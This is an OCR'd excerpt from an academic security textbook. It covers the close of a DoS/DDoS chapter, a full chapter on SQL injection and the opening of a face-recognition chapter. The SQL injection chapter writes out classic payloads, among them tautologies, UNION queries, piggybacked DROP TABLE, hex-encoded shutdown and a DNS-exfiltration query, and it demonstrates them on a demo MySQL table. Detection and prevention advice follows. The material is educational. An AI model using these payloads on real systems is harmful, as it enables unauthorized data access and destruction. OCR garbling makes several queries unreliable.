the identification of the perpetrators. The idea is to follow Internet traffic 
back to its origin. This method aids in the detection of the intruder and the 
network operator can discover what kind of DDoS attack it is [27]. 


9.11 Conclusion 


In this chapter, it’s concluded that Denial of Service (DoS) and Distributed 
Denial of Service (DDoS) are effective attacks that cause huge resource 
and financial losses. There are several tools available on the Internet 
which make it easy for an attacker to target a zombie/agent or a DoS vic- 
tim. A DoS attack disturbs the whole flow of computer traffic by transfer- 
ring a huge amount of data packets and requests to the victim machine. 
Due to the rapid development of technologies, the number of Internet 
users who fear DoS attacks is rapidly growing. Data gathered by Arbor 
Network shows that the frequency of attacks is gradually increasing year 
by year. The timeline shows that these attacks are carried out mainly 
to disturb popular companies such as GitHub, Amazon, CNN, Airbnb, 
Spotify, PayPal, Netflix, Visa, The New York Times, Reddit, and many 
others to exploit their resources, to degrade the services to the client, etc. 
To be safe from these DoS and DDoS attacks every person on the Internet 
should take some countermeasures like preventing being an agent, try- 
ing to detect and neutralize attackers, using deflection techniques to 
deflect attacks, etc. Due to DoS attacks on IoT systems, a Software- 
Defined Networking (SDN) protection approach can be used to identify 
and minimize DoS and DDoS attacks using the principle of entropy as 
the detection mechanism [26]. Various studies suggested routing pro- 
tocols to boost the stability of multi-hop networks against DoS attacks. 
Specifically, in the context of mobile ad hoc networks (MANETs), the 
logical topology changes over time using routing protocols which help to 
avoid such DoS attacks [30]. 
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9.12 Future Scope 


Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks 
cannot be completely stopped due to lack of expertise and proper defense 
mechanisms; these attacks are not stopping soon. DOS attacks on net- 
work-based devices are a frequent phenomenon in cloud services, but they 
can be mitigated by introducing third-party checkpoint access [20]. Since 
the speed and bandwidth of 5G is much higher than the previous genera- 
tion, companies will be transitioning to VoIP systems worldwide and the 
vulnerability in the SIP method used in VoIP gives freedom to attackers 
to carry out DoS attacks [22]. As different research is going on to detect 
DoS and DDoS attacks, a Network Function has been developed which 
can be used to implement as a dedicated module in the network. This will 
allow the identification mechanism more versatility to align with other 5G 
system foundations like NFV [26]. In the near future, plenty of control sys- 
tems are planned to adopt wireless technology, which increases the threat 
of frequent DoS attacks so more cyber professionals need to do important 
research in this field [30]. 


References 


1. Ormiston, Kathryn & Eloff, Mm. (2006). Denial-of-Service & Distributed 
Denial-of-Service on The Internet. 1-14. 

2. Abliz, M., 2011. Internet denial of service attacks and defense mecha- 
nisms, [online] Available at: <https://blog.oureducation.in/wp-content/ 
uploads/2014/06/Internet-Deniel.pdf>. 

3. Ali, Murad M., 2006. Intrusion Detection, Denial of Service (DoS). [ebook] 
New York: New York Institute of Technology (NYIT), Amman’s campus. 
Available at: <https://www.just.edu.jo/~tawalbeh/nyit/incs745/presentations/ 
DoS.pdf>. 

4. Help Net Security. 2021. For enterprises, malware is the most expensive type 
of attack - Help Net Security. [online] Available at: <https://www.helpnetse- 
curity.com/2019/03/07/cyberattack-cost-2018/>. 

5. Mahjabin, T., Xiao, Y., Sun, G. and Jiang, W., 2017. A survey of distributed 
denial-of-service attack, prevention, and mitigation techniques. International 
Journal of Distributed Sensor Networks, 13(12), p.155014771774146. 

6. Cybercrime Magazine. 2021. The 15 Top DDoS Statistics You Should 
Know in 2020. [online] Available at: <https://cybersecurityventures.com/ 
the-15-top-ddos-statistics-you-should-know-in-2020/>. 

7. Us.norton.com. 2021. What Are Denial of Service (DoS) Attacks? 
DoS Attacks Explained. [online] Available at: <https://us.norton.com/ 


10. 


11. 


12. 


13. 


14. 


15. 


16. 


17. 


18. 


19. 


20. 


21. 


22. 


23. 


ANALYSIS OF DOS ATTACKS AND THEIR COUNTERMEASURES’ 181 


internetsecurity-emerging-threats-dos-attacks-explained.html#:~:tex- 
t=A %20bit%200f%20history%3A%20The,research%20lab%20to%20 
power%20off.>. 


. En.wikipedia.org. 2021. Denial-of-service attack. [online] Available at: 


<https://en.wikipedia.org/wiki/Denial-of-service_attack>. 


. Cs.columbia.edu. 2021. [online] Available at: <https://www.cs.columbia. 


edu/~smb/classes/f06/122.pdf>. 

Us.norton.com. 2021. What is a DDoS attack?[online] Available at: <https:// 
us.norton.com/internetsecurity-emerging-threats-what-is-a-ddos-attack- 
30sectech-by-norton.html>. 

Tools.cisco.com. 2021. What Is the Difference: Viruses, Worms, Trojans, 
and Bots? [online] Available at: <https://tools.cisco.com/security/center/ 
resources/virus_differences#dos_attacks>. 

www.kaspersky.com. 2021. What is a Trojan Virus? [online] Available at: 
<https://www.kaspersky.com/resource-center/threats/trojans>. 

Gu, Q & Liu, P 2012, Denial of Service Attacks. In Handbook of 
Computer Networks. vol. 3, John Wiley and Sons, pp. 454-468. https://doi. 
org/10.1002/9781118256107.ch29 

Mirkovic, Jelena, Martin, Janice & Reiher, Peter. (2003). A Taxonomy of 
DDoS Attacks and DDoS Defense Mechanisms. 

Mirkovic, J. and Reiher, P., 2004. A taxonomy of DDoS attack and DDoS 
defense mechanisms. ACM SIGCOMM Computer Communication Review, 
34(2), pp.39-53.r 

Mishra, Anjana & Ghosh, Soumitra & Mishra, Brojo. (2019). Cybersecurity: 
A Practical Strategy Against Cyber Threats, Risks with Real World Usages. 
10.1002/9781119488330. ch13. 

Hsu, F., Hwang, Y., Tsai, C., Cai, W., Lee, C. and Chang, K., 2016. TRAP: A 
Three-Way Handshake Server for TCP Connection Establishment. Applied 
Sciences, 6(11), p.358. 

Techterms.com. 2021. UDP (User Datagram Protocol) Definition. [online] 
Available at: <https://techterms.com/definition/udp>. 

Mishra, Anjana & Bisoy, Sukant. (2018). Understanding the Aspect of 
Cryptography and Internet Security: A Practical Approach. 

Gunasekhar, T., Rao, K., Saikiran, P. and Lakshmi, P., 2014. A Survey on 
Denial of Service Attacks. International Journal of Computer Science and 
Information Technologies, [online] 5 (2). Available at: <http://ijcsit.com/docs/ 
Volume%205/vol5issue02/ijcsit20140502320.pdf>. 

Arshi, M., Nasreen, M. and Madhavi, K., 2020. A Survey of DDOS Attacks 
Using Machine Learning Techniques. E3S Web of Conferences, 184, p.01052. 
Nazih, W., Elkilani, W., Dhahri, H. and Abdelkader, T., 2020. Survey of 
Countering DoS/DDoS Attacks on SIP Based VoIP Networks. Electronics, 
9(11), p.1827. 

Hasbullah, Halabi&Soomro, Irshad& Ab Manan, Jamalul-Lail. (2010). 
Denial of service (DOS) attack and its possible solutions in VANET. 65. 


182 


24, 


25. 


26. 


27. 


28. 


29. 


30. 


WIRELESS COMMUNICATION SECURITY 


Chourasia, A. and Chourasia, A., 2017. An analysis and review against 
Denial of service attack for smart grid system. International Research Journal 
of Engineering and Technology (IRJET), [online] 04(05). Available at: <https:// 
www.irjet.net/archives/V4/i5/IRJET-V415366.pdf>. 

En.wikipedia.org. 2021. Smart grid. [online] Available at: <https://en.wikipe- 
dia.org/wiki/Smart_grid>. 

Galeano-Brajones, J., Carmona-Murillo, J., Valenzuela-Valdés, J. and Luna- 
Valero, F., 2020. Detection and Mitigation of DoS and DDoS Attacks in IoT- 
Based Stateful SDN: An Experimental Approach. Sensors, 20(3), p.816. 
Stephen M. Specht and Ruby B. Lee, Distributed Denial of Service: 
Taxonomies of Attacks, Tools, and Countermeasures. Proceedings of the 17th 
International Conference on Parallel and Distributed Computing Systems, 2004 
International Workshop on Security in Parallel and Distributed Systems, pp. 
543-550. 

Prakash, A. &Murali, Satish &Bhargav, T. & Natarajan, Bhalaji. (2016). 
Detection and Mitigation of Denial of Service Attacks Using Stratified 
Architecture. Procedia Computer Science. 87. 275-280. 10.1016/j. 
procs.2016.05.161. 

Kamil, Wisam & Awang Nor, Shahrudin & Alubady, Raaid. Research Article 
Performance Evaluation of TCP, UDP and DCCP Traffic Over 4G Network. 
Research Journal of Applied Sciences, Engineering and Technology. 11. 1048- 
1057, 2015. 10.19026/rjaset.11.2118. 

Cetinkaya, A., Ishii, H. & Hayakawa, T., 2019. An Overview on Denial-of- 
Service Attacks in Control Systems: Attack Models and Security Analyses. 
Entropy, 21(2), p. 210. Available at: http://dx.doi.org/10.3390/e21020210. 


10 
SQL Injection Attack on Database System 


Mohit Kumar 


NSUT East Campus Formerly Ambedkar Institute of Advanced Communication 
Technologies and Research, Delhi, India 


Abstract 

In recent years database security is very much needed to defend against differ- 
ent attacks. In this chapter we will discuss the practical implementation of the 
SQL injection attack by using the MySQL database server in which we understand 
how an attacker can compromise the database security by using the SQL injection 
statements embedded with the normal SQL queries. This chapter also discusses 
the detection and prevention mechanism from the SQL injection attack and how 
to protect our database from this type of attack and also gives a better understand- 
ing of the SQL injection statements. 


Keywords: SQL injection, SQL injection vulnerability 


10.1 Introduction 


SQL injection is a type of attack in which an attacker can exploit the web 
security vulnerability with the help of SQL queries the particular applica- 
tion makes to its database. It can allow the attacker to view the data in an 
unauthorized manner such as users’ data, data that the application itself 
is able to access. In this attack an attacker can modify and delete the data 
from the database. If the SQL injection attack is successful it can lead to the 
following [2, 6]: 
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e Unauthorized access to sensitive data. 
¢ Backdoor entry in the database system. 
e Modify and delete the sensitive data. 


Example of SQL injection attack 


e Retrieving hidden data 

e UNION attacks 

e Blind SQL injection 

e Subverting application logic 


There are two main reasons why the SQL injection is also a problem 
which are as follows: 


« Some web developers are not aware of the SQL injection 
attack which can make the website vulnerable. 

¢ If we provide security in our network, hackers are looking 
for a new attack on that system and new vulnerabilities are 
also found in the system. 


With the advent of mobile phones, smartphones, and tablets, etc., which 
run on the Android-based, Java-based and IOS-based operating system, a 
large amount of the data in those devices are stored in the database which 
is called as the SQLite database. As it is also the database which is used to 
store handheld device information it is also vulnerable to SQL injection 
attack. So, it is important to understand that the web applications, mobile 
applications and desktop applications and those devices which are con- 
nected to the database are also the targets of the SQL injection attack, and 
it can also steal the personal information of the user and use it for personal 
purposes as well [3]. 

In this chapter we are going to implement the SQL injection attack by 
using SQL injection statements with the SQL queries on the MySQL data- 
base server and understand the working of the SQL injection attack and 
also understand how an attacker implements the SQL injection attack with 
the SQL statements. This chapter also provides knowledge about the detec- 
tion and prevention countermeasures of the SQL injection and provides 
the proper security to our information system. 


10.1.1 Types of Vulnerabilities 


Types of vulnerabilities in SQL injection are as follows: [1, 3]. 
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e Type 1 Vulnerability: In this type of vulnerability, we can 
check the suspicious input for malicious activity in the web- 
site with the help of the input validation. Suspicious input may 
permit a malicious code to be executed many times without 
proper and exact verification on the original intention. 

e Type 2 Vulnerability: In this type of vulnerability, there is 
the difficulty in the characterization in the different data 
types which we used in the programming language for the 
web development. 

e Type 3 Vulnerability: In this type of vulnerability, any pro- 
cess delay in the analysis stage till the runtime stage as the 
present variables are measured despite the source code using 
an expression to achieve the attack. 

e Type 4 Vulnerability: In this type of vulnerability, there is 
improper definition of the datatype while designing. 


10.1.2 Types of SQL Injection Attack 


Different types of SQL injection attacks are as follows: [1, 2, 7] 


e Tautology: By passing authentication and data extraction in 
which an attacker injects the code in one or more condi- 
tional statements. 

Example: Select * from student where std_id=” or “6=6’; 


¢ Logically incorrect queries: Information extraction from 
the database, identify the injectable patterns, and perform- 
ing the database fingerprinting. 
Example: Select accounts from student where login=” AND 
pass="; 


e Union Query: By passing the authentication and data 
extraction in which an attacker exploits the vulnerability 
parameter to change the data set by using the union operator. 
Example: Select * from student where std_name=’abe union select 
* from academic where id=’421’ ‘pass=’2=2’; 


e Stored Procedure: By using the built-in procedures to per- 
form the malicious action in the database. 
Example: Select accounts from student where login= ‘abc AND 
pass="; SHUTDOWN; 


186 WIRELESS COMMUNICATION SECURITY 


10.1.3 


Piggybacking queries: By appending the malicious query to 
the legitimate query in the database. 
Example: Select * from emp where name= ‘abc’; drop table emp; 


Inference: It can enable the attacker to change the behavior 
of the application or database. 


Alternate Encodings: In this attack, an intruder can mod- 
ify the injection query via using alternate encoding, such 
as hexadecimal, ASCH, and Unicode. Example: Select 
accounts from student where login= “AND pin=0; exec 
(char(0x73687574646f776e)). 


Impact of SQL Injection Attack 


There are various impacts of SQL injection attacks, which are given below 


[3, 5]: 


10.2 


Impact to Confidentiality: Attacker can steal the sensitive 
information such as user credentials, organization secrets. 
Impact to Integrity: Attacker can update, delete, and insert 
the malicious data in the database, which can make the data- 
base vulnerable. 

Impact to Authentication and Authorization: Attacker can 
take unauthorized access of the data in the database by steal- 
ing the authorized user credential. 


Objective and Motivation 


My objective and motivation for the chapter on SQL injection attacks are 
as follows: 


To give better understanding of how we can implement the 
SQL injection attack by using MySQL database server and 
SQL queries. 

This chapter provides countermeasures information regard- 
ing the SQL injection attack. 

This chapter provides information regarding the different 
types of SQL injection statements. 
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e ‘This chapter provides knowledge of the SQL injection with 
the help of the flowchart or process flow of the SQL injection 
attack. 


Print Headers 


J =next_url 


| = next_payload 


R = launch_probe 


R. status_code ==500 


Launch manual attack 


Figure 10.3.1 Flowchart of SQL injection attack. 
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10.3. Process of SQL Injection Attack 


In this section we show the flowchart of the SQL injection in Figure 10.3.1 
which is given below and discuss how an attacker can compromise the com- 
puter system, SQL server, and database using the SQL injection technique. 


10.4 Related Work 


In the paper author [1] presented a detailed study on proposed methods 
and tools for detection and prevention of SQL injection attacks in the last 
decade and discussed the effectiveness of the detection and prevention 
mechanism. 

In the paper author [2] presented the classical and modern types of SQL 
injection attack and displayed the different existing techniques and tools 
which can be used to detect and prevent an SQL injection attack as well as 
other cyberattacks. 

In the paper author [3] proposed a technique called CombinedDetect 
based on two methods named as JavaScript and PHP coding to detect 
malicious SQL query and separate the normal data and malicious data and 
prevent an SQL injection attack. 

In the paper author [4] implemented the detection of the SQL injection 
attack using the NIST method in network forensics in which firstly it cre- 
ated SQL injection scenarios and after that created the log file using the 
snort tool rule. The snort tool then mitigated the SQL injection attack by 
alerting the system using email. The result was analyzed with the help of 
user acceptance testing. 

In the paper author [5] projected an approach to mitigate the SQL injec- 
tion attack and maintain the database security by using a hybrid encryp- 
tion mechanism in the form of Advanced Encryption Mechanism (AES) 
and Elliptical Curve Cryptography (ECC) in which AES at login phase 
prevents unauthorized access to the databases and ECC is used to encode 
the database so that no one can access the database without the key. 

In the paper author [6] presented the web application system in which 
users can learn and practice SQL injection attacks. Basically this system is 
designed for students to become familiar with the SQL injection attack. In 
this system it contains 12 levels of SQL vulnerabilities which an attacker 
can exploit and compromise the database security. 
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In the paper author [7] presented an approach which detects the SQL 
injection attack in two steps. First, one creates lexicon, and the second 
step tokenizes the input query statement. Each token was detected to pre- 
defined words lexicon to prevent the SQL injection attack. 

In the paper author [8] proposed an SQL injection detection method by 
using deep learning framework on the basis of comprehensive domestic 
and international research. This method can improve accuracy and also 
reduce the false alarm rate. 


10.5 Literature Review 


In the literature review we will discuss the different techniques or methods 
of the SQL injection attack and understand how we can compromise the 
system vulnerability using the SQL injection attack. 


Incorrectly filtered escape characters 


In this type of SQL injection, when the escape characters input is not fil- 
tered in the user input and pass it to the SQL query, this will result in the 
query alteration in the database by the end-user application [2]. 


statement = " SELECT * 
FROM users WHERE name = 


+ userName + 


Figure 10.5.1 Code for filtered incorrectly escape characters [2]. 


The above SQL code is used to extract the records of the specified user- 
name from its table of users. If we replace the “username” entity in an 
incorrect way by the unauthorized user then the attacker gets the data from 
the database. An example of the malicious attack is shown in the diagram 
below [2]. 
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SELECT * FROM users WHERE 


name uy (OR, Yaa s 


Figure 10.5.2 Malicious attack by replacing the “username” in incorrect way [2]. 


Most SQL statements implement multiple statements on the SQL server 
but it can help the attacker to modify the queries and data and make the 
database more vulnerable, which is shown in the diagram below [2]. 


SELECT * FROM users WHERE 
name = 'a';DROP TABLE 


users; SELECT * FROM 
userinfo WHERE 't' 


Figure 10.5.3 Multiple SQL queries attack by attacker [2]. 


Blind SQL injection 


In this type of SQL injection, the website vulnerability is visible to the attacker 
but the attacker cannot view the result of the attack. This type of attack 
has traditionally been considered time-intensive because a new statement 
needed to be crafted for each bit recovered, and depending on its structure, 
the attack may consist of many unsuccessful requests. Recent advancements 
have allowed each request to recover multiple bits, with no unsuccessful 
requests, allowing for more consistent and efficient extraction [2]. 


Conditional responses 


This type of attack is an example of blind SQL injection which can evaluate 
the logical SQL queries in the database. For example, an attacker can load 
the URL https://books.example.com/review?id=5 OR 1=1 which can result 
in the query given below. 


SELECT * FROM bookreviews 


WHERE ID '5' OR '1'='1'; 


Figure 10.5.4 Conditional response [2]. 
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If the above statement in the diagram shows the result as the original 
SQL statement then the website is vulnerable to the SQL injection attack 
because the query passed through successfully as the legal SQL statement. 

The attacker also can also reveal the version of the MySQL and other 
information by using the string 


"https://books.example.com/review?id=5 AND _ substring(@@ver- 
sion, 1, INSTR(@@version, °) - 1)=4" 


which can be used by the attacker to fulfill its goal and access more infor- 
mation from the SQL server and find other vulnerability for the another 
SQL injection attack [2]. 


Second order SQL injection 


In this type of attack malicious SQL queries are hidden in the input values 
which are stored as a valid SQL statement and then it is executed the SQL 
queries stored as valid SQL queries. This type of attack needs more knowl- 
edge of the input values and how these values will be used for the attack. 
It will be difficult for the investigator to detect this type of SQL injection 
statement. The investigator can use the web automated tools for the detec- 
tion of this type of attack and find out the evidence [2]. 


SQL Injection and Domain Name Service Hijacking 


In this type of attack, the attacker can embed the SQL query in a DNS 
request and capture it and make its way onto the internet [2]. 


ido_dns_lookup( (select top 1 password 


from userTable) + ’.inse6140.net’ ); 


Figure 10.5.5 SQL injection and DNS attack [2]. 
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10.6 Implementation of the SQL Injection Attack 


10.6.1 Access the Database Using the 1=1 SQL Injection 
Statement 


Step 1) Create database and create table student inside the database and 
insert the values in the table student by the authorize user. 


ysql> create table student(userid int, password int, firstname varchar(255), lastname varchar(255)); 
Query OK, @ rows affected (@.89 sec) 


ysql> insert into student values('1', '123', ‘abc', ‘xyz'); 
ery OK, 1 row affected (@.26 sec) 


sql> insert into student values('2', '456', ‘dcf', ‘def'); 
ery OK, 1 row affected (@.17 sec) 


sql> insert into student values('3', '789', ‘jkl', ‘efg'); 
ery OK, 1 row affected (@.17 sec) 


Figure 10.6.1.1 Student table creation and insert the values [4]. 
Step 2) Access the table by the authorized user by using the SQL state- 
ment given below: 


“select * from student;” 


mysql> select * from student; 
+#-------- +---------- +----------- +---------- + 


| userid | password | firstname | lastname | 


3 rows in set (0.00 


Figure 10.6.1.2 Access the table [4]. 


Step 3) Access the table content by the unauthorized user by using the 
1=1 sql statement which is given as: “select * from student where userid = 
‘2’ or 1=1;” and give unauthorized access to the attacker. 


456 | def 
789 | jkl 


3 rows in set (@.0@ sec) 


Figure 10.6.1.3 Unauthorized table access using 1=1 sql statement [4]. 
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10.6.2 Access the Database Using the ““=”” SQL Injection 
Statement 


Step 1) Create database and create table student inside the database and 
insert the values in the table student by the authorized user. 


ysql> create table student(userid int, password int, firstname varchar(255), lastname varchar(255)); 
Query OK, @ rows affected (0.89 sec) 


ysql> insert into student values('1', '123', ‘abc’, ‘xyz'); 
Query OK, 1 row affected (0.26 sec) 


mysql> insert into student values('2', '456', ‘def', ‘def'); 
Query OK, 1 row affected (0.17 sec) 


ysql> insert into student values('3', '789', ‘jkl', ‘efg'); 
Query OK, 1 row affected (0.17 sec) 


Figure 10.6.2.1 Student table creation and insert the values [4]. 


Step 2) Access the table by the authorized user by using the SQL statement 
given below: 


“select * from student;” 


ysql> select * from student; 


123 | abc 
456 | def 


B rows in set (0.00 sec) 


Figure 10.6.2.2 Access the table [4]. 


Step 3) Access the table content by the unauthorized user by using the 


©9909-9999 


=”” sql statement which is given as: “select * from student where first- 


name = “” or “”= “” and password = “” or “”= “”;” and give unautho- 


rized access to the attacker. 


ysql> select * from student where firstname = or 
-------- t----------4-----------4----------+ 
| userid | password | firstname | lastname 


and password = 


rows in set (0.00 sec) 


999999 


Figure 10.6.2.3_ Unauthorized table access using sql statement [4]. 
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10.6.3 Access and Upgrade the Database by Using Batch SQL 
Injection Statement 


Step 1) Create database and create table student inside the database and 
insert the values in the table student by the authorized user. 


mysql> create table student(userid int, password int, firstname varchar(255), lastname varchar(255)); 
Query OK, @ rows affected (0.89 sec) 


mysql> insert into student values('1', ‘123', ‘abc’, ‘xyz'); 
Query OK, 1 row affected (@.26 sec) 


mysql> insert into student values('2', '456', ‘def’, ‘def'); 
Query OK, 1 row affected (@.17 sec) 


mysql> insert into student values('3', '789', 'jkl', ‘efg'); 
Query OK, 1 row affected (@.17 sec) 


Figure 10.6.3.1 Student table creation and insert the value [4]. 


Step 2) Access the table by the authorized user by using the SQL state- 
ment given below: 


“select * from student;” 


yvsql> select * from student; 

p-------- 4---------- $----------- $o--------- + 
| userid | password | firstname | lastname | 
}-------- $---------- $----------- 


123 | abc 
A56 | def 
789 | jkl 


3 rows in set (@.0@ sec) 


Figure 10.6.3.2 Access the table [4]. 


Step 3) Update the table content by the unauthorized user by using 
the batched sql statement which is given as “select * from student where 
userid=’3’; update student set firstname = ‘rst’ where userid=’1’;” and 
update the content of the student table database and when we view the 
data using “select * from student;” the content is updated. 
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sql> select * from student where userid = '3'; update student set firstname = ‘rst’ where userid = '1'; 


Rows matched: 1 Changed: 1 Warnings: @ 


ysql> select * from student; 


123 | rst 
456 | def 
789 | jkl 


B rows in set (0.00 sec) 


Figure 10.6.3.3. Modify table content using batched sql statement [4]. 


Step 4) Delete the table content by the unauthorized user by using the 
batched sql statement which is given as “select * from student where use- 
rid=3’; delete from student where userid=’1’;” and delete the content of 
the student table database, and when we view the data using “select * from 


student;” the content is deleted. 


sql> select * from student where userid="3'; delete from student where userid='1'; 


456 | def 
789 | jkl 


2 rows in set (0.00 sec) 


Figure 10.6.3.4 Delete table content using batched sql statement [4] 


Step 5) Drop the table content by the unauthorized user by using the 
batched sql statement which is given as “select * from student where use- 
rid=’3’; drop table student;” and delete the content of the student table 
database, and when we view the data using “select * from student;” the 
table is dropped. 
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ysql> select * from student where userid="3'; drop table student; 


w------- $----------4-----------4----------+ 
| userid | password | firstname | lastname | 
-------- 4----------+4-----------4----------+ 


+ 
789 | jkl 


row in set (@.0@ sec) 
Query OK, @ rows affected (@.76 sec) 


sql> select * from student; 
RROR 1146 (42802): Table ‘student.student' doesn't exist 


Figure 10.6.3.5 Drop table using batched sql statement [4]. 


10.7 Detection of SQL Injection Attack 
Detection mechanism for the SQL injection attack is as follows: 


e Use the single quote alphabet “ and check for errors and 
anomalies. 

« By using SQL-specific command that evaluate the value at 
the starting point to a different value and then check for the 
difference in the responses. 

e Use the Boolean values such as OR 1=1 and OR 1=2 and 
then check the difference in their result. 

e Use the large amount of data for time delays embed with 
an SQL query, and check for contrast in the time taken to 
respond [1, 4]. 


10.8 Prevention/Mitigation from SQL Injection Attack 


e Don't use dynamic SQL: Use prepared statements, param- 
eterized queries or stored procedures whenever needed. But 
don't overuse it or we can say that at every time don’t use the 
dynamic SQL statement. 

e Update and patch: Apply the patches and updates ina timely 
manner when available to prevent the exploitation of the 
vulnerabilities in the web applications and in the database. 

e Use appropriate privileges: We should give limited access 
to those who are working on the web application which can 
limit the attack or illegal activity in the web application to a 
certain extent. 
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e Enforcement at the coding level: We can use the object- 
relational mapping libraries to avoid the use of SQL code. 

e Escaping: A simple method is that to prevent SQL injection 
we have to avoid the use of characters that have the special 
meaning in SQL queries such as (‘), (°), \x00, \n etc. 

¢ Trust no one: We must not trust each and every data and 
their values. We have to filter out the user data by context 
[1, 2]. 


10.9 Conclusion 


In this chapter we have studied and discussed the SQL injection and types 
of SQL injection, as well as the methodology of how an attacker executes 
an SQL injection attack and its practical implementation. We have also 
offered some detection and prevention steps about how we can provide 
database security from SQL injection. In future, many methodologies will 
be needed to determine how an attacker implements an SQL injection 
attack and how we can detect and prevent such an attack. Also in future we 
will be concerned about the weakness in SQL server database, and also deal 
with poor database functionality and irregularity in updating the patches 
in the database security. For these concerns more techniques and meth- 
odologies will emerge and be implemented to understand how an attacker 
can implement an SQL injection attack; more prevention and detection 
mechanisms will also emerge in the near future. 
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Abstract 

The modern world is rapidly revolutionizing the way things work. Everyday 
actions are being handled electronically. Based on this, a sub-division of applica- 
tion in recognition, specifically face recognition, emerged. Face recognition is a 
technology capable of verifying the identity of an individual using their face from 
a digital frame against a database. It has been one of the most captivating and 
prime research fields in the past few decades. The motivation came from the need 
of automated recognition and verification. Compared with traditional biometric 
systems, i.e., fingerprint recognition and iris recognition, face recognition has 
numerous advantages, not just limited to “no-contact” and “user friendly”. Face 
recognition is currently being used to make the world smarter and safer. It has 
future scope to be used in finding missing people, e-commerce, education and 
many fields. Artificial Intelligence is one of the upcoming and important areas in 
the field of research and development. It solves various image-related tasks using 
different algorithms. A number of papers have been published on this subject giv- 
ing an idea of how accurately and efficiently these techniques identify people. This 
chapter explores general machine learning algorithms and neural network archi- 
tectures to identify the identity of an individual, comparing them to see which 
algorithm works best under certain conditions. 
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11.1 Introduction 


In today’s busy world, maintenance of both the security of physical prop- 
erty as well as information is becoming increasingly difficult as well as 
important. To tackle this concern, researchers came up with a solution 
of a face recognition system. Face recognition is an important solution to 
many practical problems (e.g., credit card fraud, IOT attacks by intrud- 
ers, or security breaches in a company or government building, etc.). In 
most of these situations criminals used to take advantage by easily making 
fake or duplicate identities through which they were able to commit crimes 
using someone else’s identity and escape detection, but with the FRS (face 
recognition system) these problems can be minimized to an extent. Also, 
now most of these criminals get caught and are punished under the law. 

FRS has rapidly developed in the past few decades, hence now it is used 
in every sector - from healthcare to agriculture, from industries to law 
enforcement and many more. And with the advancement in technologies, 
particularly in the field of Artificial Intelligence and Machine Learning, 
FRS will get more advanced and secure in the future. 

Face recognition — an algorithm which can identify or confirm the iden- 
tity of a person, thing or any other material by analysing their images. It is 
widely used for security purposes, law enforcement, etc. There are many 
factors which make a good recognition system, such as a large database of 
facial images and a system that can analyze the accuracy and efficiency of 
the FCR. There are many other factors but the two mentioned above are 
the most important. 

In this chapter it is shown how machine learning and deep learning 
techniques can be employed to develop a face recognition system, and a 
comparison is done among different techniques used. The main algorithm 
used is the Convolutional Neural Network (CNN) which is a deep learn- 
ing algorithm that takes input as image and does mapping on the import- 
ant features by assigning different weights/biases to various aspects of the 
image and hence is able to recognize images. 

The following machine learning and deep learning techniques are used 
in the experiment: 


e K-Nearest Neighbors 

e Support Vector Machine 

e Logistic regression 

e Naive Bayes 

e Decision tree 

e Convolutional Neural Network (CNN) 
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Since many machine learning and deep learning algorithms are used, 
a basic introduction regarding each is presented in the following section. 


11.2 Face Recognition System (FRS) in Security 


Facial recognition systems upgraded biometric security to the next level. 
They are considered more secure than other security techniques due to 
their high acceptability and uniqueness, and they involve shorter process- 
ing time. Using a face recognition system as a security measure in leading 
institutions and workplaces ensures that there is absolutely no room for 
vandalism or human error. 

There are many applications of face recognition systems in security. A 
few of these applications are described below. 


e Criminal Identification —- Most individuals conceal their 
identity (cover their faces with mask, scarves, etc.) while 
committing a criminal offence. Face recognition proved to 
be a tremendous advantage to law enforcement by helping 
them to recognize a person merely by scanning a masked 
face. It can also be used to identify unconscious or dead peo- 
ple at crime scenes. 

e Bank Services —- Most bank services use passwords exclu- 
sively as a security measure, but a major drawback of using 
only passwords is that they're based on an individual's 
knowledge. Moreover, the more complicated passwords 
become, the easier people tend to forget them. Even security 
questions aren't entirely reliable. A professional could use 
social engineering to learn sensitive information, ultimately 
compromising the security of bank accounts. Since a face is 
undoubtedly connected to its owner, face recognition can be 
offered as a second factor in authentication along with pass- 
words to present more barriers to defrauders. 

e Healthcare - Every year the healthcare sector generates 
large amounts of sensitive data which is an easy target for 
cyber thieves. In order to safeguard sensitive data, hospitals 
are examining the use of face recognition techniques. It is 
also being used to identify patients and access patient reg- 
istration and records. It helps to stop patient impersonation 
(when someone tries to get expensive medical treatment for 
free). In the midst of the global COVID-19 pandemic this 
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technology has helped in tracking down people who are in 
quarantine without coming in direct contact with them. 

e Tracking Attendance - Using a key-card for security access 
is simple and pretty generic. However, anyone with access 
to a code/key-card can misuse it, whereas face identification 
cannot be forged, i.e., only legitimate individuals can gain 
access. It has other unquestionable advantages such as it 
can reduce administrative cost, improve employee produc- 
tivity, and get real-time data of number of hours employees 
worked, etc. 


11.3 Theory 


11.3.1 Neural Networks 


A neural network is a system/collection of neurons which is used to rec- 
ognize patterns in a dataset through a process that mimics the functioning 
and nature of the human brain’s neural network. For instance, when some- 
one hears something, this is called data and is processed by data process- 
ing cells known as neurons in the brain, which recognize what sound it 
is; a neural network works in a similar manner. These networks are used 
because of their phenomenal ability to extract meaningful information 
from complex or imperfect data, which can be used to detect complex pat- 
terns that are too complicated to be detected by any other computer tech- 
niques or humans. They easily adapt to the changing input data as well so 
that they can give the best solution to the problem in front of the machine 
and generate new output easily, according to the updated criteria. 

The fundamental unit of computation in the neural network is a neuron, 
also known as a perceptron. It gets its input from an external source or 
some other perceptrons and calculates an output value to be passed or the 
final result. A neural network consists of several perceptrons in many lay- 
ers. A neural network can have one or more layers and each layer can have 
one or more neurons. The most basic type of neural network comprises 
three layers: input unit layer connected to a layer of hidden units, which is 
further connected to an output unit layer. 


e Input Unit - First layer. Raw data is fed into this layer of net- 
work from which the neural network has to learn. 
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e Hidden Unit - Layer between input and output layer. This 
has a function programmed in it which applies relevant val- 
ues to input and passes it to the output layer. 

e Output Unit - Last Layer. This has the output value or label 
which the neural network is trying to predict. 


There are numerous interconnections between layers. These inter- 
connections extend from each perceptron in the first layer to every 
single perceptron in the second layer, which are called weights between 
layers. These weights are assigned on the basis of their correlative 
importance to other inputs. On arranging vectors of weights corre- 
sponding to each input perceptron horizontally, a matrix is formed 
known as a weight matrix [1]. There's also a trainable bias value pres- 
ent at each perceptron which is not dependent on input value just to 
add a bit of adjustability. Now if the weight matrix is multiplied with 
the input vector and a bias vector is added, intermediate perceptron 
values are obtained. 

In spite of the fact that the neural network is a very complicated config- 
uration, it will be ineffective in solving problems because of non-linearity. 
Regardless of what weights are used, at the end of the day the change in 
input values will only result in linear change in the output vector [4]. But 
in the real world this is undesirable as data has non-linear relationships 
between input and output variables. This problem is solved by introducing 
an activation function at the end of each perceptron. It can also be used to 
